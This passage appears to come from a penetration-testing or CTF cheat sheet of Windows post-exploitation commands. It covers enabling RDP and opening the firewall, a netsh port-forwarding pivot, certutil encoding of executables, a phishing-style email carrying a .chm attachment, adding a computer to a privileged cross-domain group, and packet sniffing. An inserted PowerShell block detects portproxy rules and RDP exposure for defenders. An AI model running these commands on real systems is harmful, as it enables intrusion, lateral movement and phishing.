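Tamper protection is what stops both the registry and the Set-MpPreference route from taking effect, so TamperProtection = False together with a PolicyDisableRealtime = True row is the combination to investigate; a Bypass value in the LocalMachine or CurrentUser scope of the execution policy output means Set-ExecutionPolicy was run persistently, while "-ep bypass" on a command line only ever shows up in the Process scope of that shell.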

   

Misc commands

 

⚡ Any misc or general command will be here

 

[+] Enable RDP and allow it in the firewall too

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

 

[+] Port forwarding

netsh interface portproxy add v4tov4 listenport=2525 listenaddress=192.168.50.48 connectport=25 connectaddress=192.168.21.55
netsh advfirewall firewall add rule name=smtpfrwd dir=in action=allow protocol=TCP localport=2525
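Added example, not from this repo: how a defender finds the two changes above again on a host. netsh portproxy rules are persisted under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy (value name = listen address/port, data = connect address/port), and the RDP switch lives in the Terminal Server key; the firewall side is read through the NetSecurity module. Function names are mine.

```powershell
# Added example (not part of the original repo).

function Get-PortProxyRule {
    # Walk PortProxy\<v4tov4|v4tov6|...>\tcp and emit one object per forwarding rule
    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy'
    Get-ChildItem -Path $base -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -eq 'tcp' } |
        ForEach-Object {
            $key  = $_
            $type = $key.PSParentPath.Split('\')[-1]
            foreach ($name in $key.GetValueNames()) {
                [pscustomobject]@{ Type = $type; Listen = $name; ConnectTo = $key.GetValue($name) }
            }
        }
}

function Get-RdpExposure {
    $ts = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rules = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RdpEnabled         = ($ts.fDenyTSConnections -eq 0)     # 0 is what the reg add above sets
        FirewallRulesOpen  = @($rules | Where-Object { $_.Enabled -eq 'True' }).Count
        FirewallRulesTotal = @($rules).Count
    }
}

function Get-CustomAllowRule {
    # Inbound allow rules that are not part of any predefined group, like the
    # "smtpfrwd" rule above, are the ones an administrator did not create via the UI
    Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True |
        Where-Object { -not $_.DisplayGroup } |
        Select-Object DisplayName, Profile, @{ n = 'Port'; e = { ($_ | Get-NetFirewallPortFilter).LocalPort } }
}

Get-PortProxyRule  | Format-Table -AutoSize
Get-RdpExposure    | Format-List
Get-CustomAllowRule | Format-Table -AutoSize
```

A portproxy rule on a workstation is almost never legitimate; "netsh interface portproxy reset" clears them all, and the listening side is visible in netstat as a socket owned by svchost (IpHlpSvc), which is worth remembering when a listener has no obvious process behind it.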

 

[+] Recursive files search (Powershell)

// Search for all txt files

Get-ChildItem -Path C:\ -Filter *.txt -Recurse -ErrorAction SilentlyContinue -Force

// Search for flag.txt

Get-ChildItem -Path C:\ -Filter flag.txt -Recurse -ErrorAction SilentlyContinue -Force

 

[+] Search for files in a specific date range (Powershell)

// If you want to search for folders or files without extensions, please remove (-include *.*)

Get-ChildItem -erroraction 'silentlycontinue' -recurse -include *.* -path C:\Users | ? {$_.lastwritetime -gt '10/10/2020' -AND $_.lastwritetime -lt '11/11/2020'}

 

[+] Encode and decode a file (Base64)

// Encode a file to base64

certutil -encode mail.exe encoded.txt

// Decode a base64 file

certutil -decode encoded.txt mail.exe

 

[+] Send a message with attachments (Powershell)

Send-MailMessage -From "user<[email protected]>" -To "lbunce<[email protected]>" -Subject "Check the important doc please" -SmtpServer 192.168.21.55 -Attachments .\doc.chm

 

[+] Get group or user by SID (Need AD module)

// AD Group 

Get-ADGroup -Identity S-1-5-21-948911695-1962824894-4291460450-1124

// AD Username

Get-ADUser -Identity S-1-5-21-948911695-1962824894-4291460450-26105

 

[+] Add a domain computer to a group in a different domain (Need AD module)

// Group name and specify the domain

$group = Get-ADGroup -Identity 'DatabaseOwners' -Server 'alharbi.corp'

// Computer name and specify the domain ( You can change it to user by using "Get-ADUser")

$pc = Get-ADComputer -Identity 'hitman-pc01$' -Server 'hitman.corp'

// Add the computer to the group :D

Add-ADGroupMember -Identity $group -Members $pc

 

[+] Unzip compressed file (PowerShell)

Expand-Archive -Force ad.zip C:\users\public\ad

 

[+] Sniff network packets (PowerShell)

// Download the sniffer.ps1 from https://raw.githubusercontent.com/sperner/PowerShell/master/Sniffer.ps1

./sniffer.ps1 -LocalIP 192.168.4.111  -ScanIP 192.168.42.14 -Protocol tcp

   
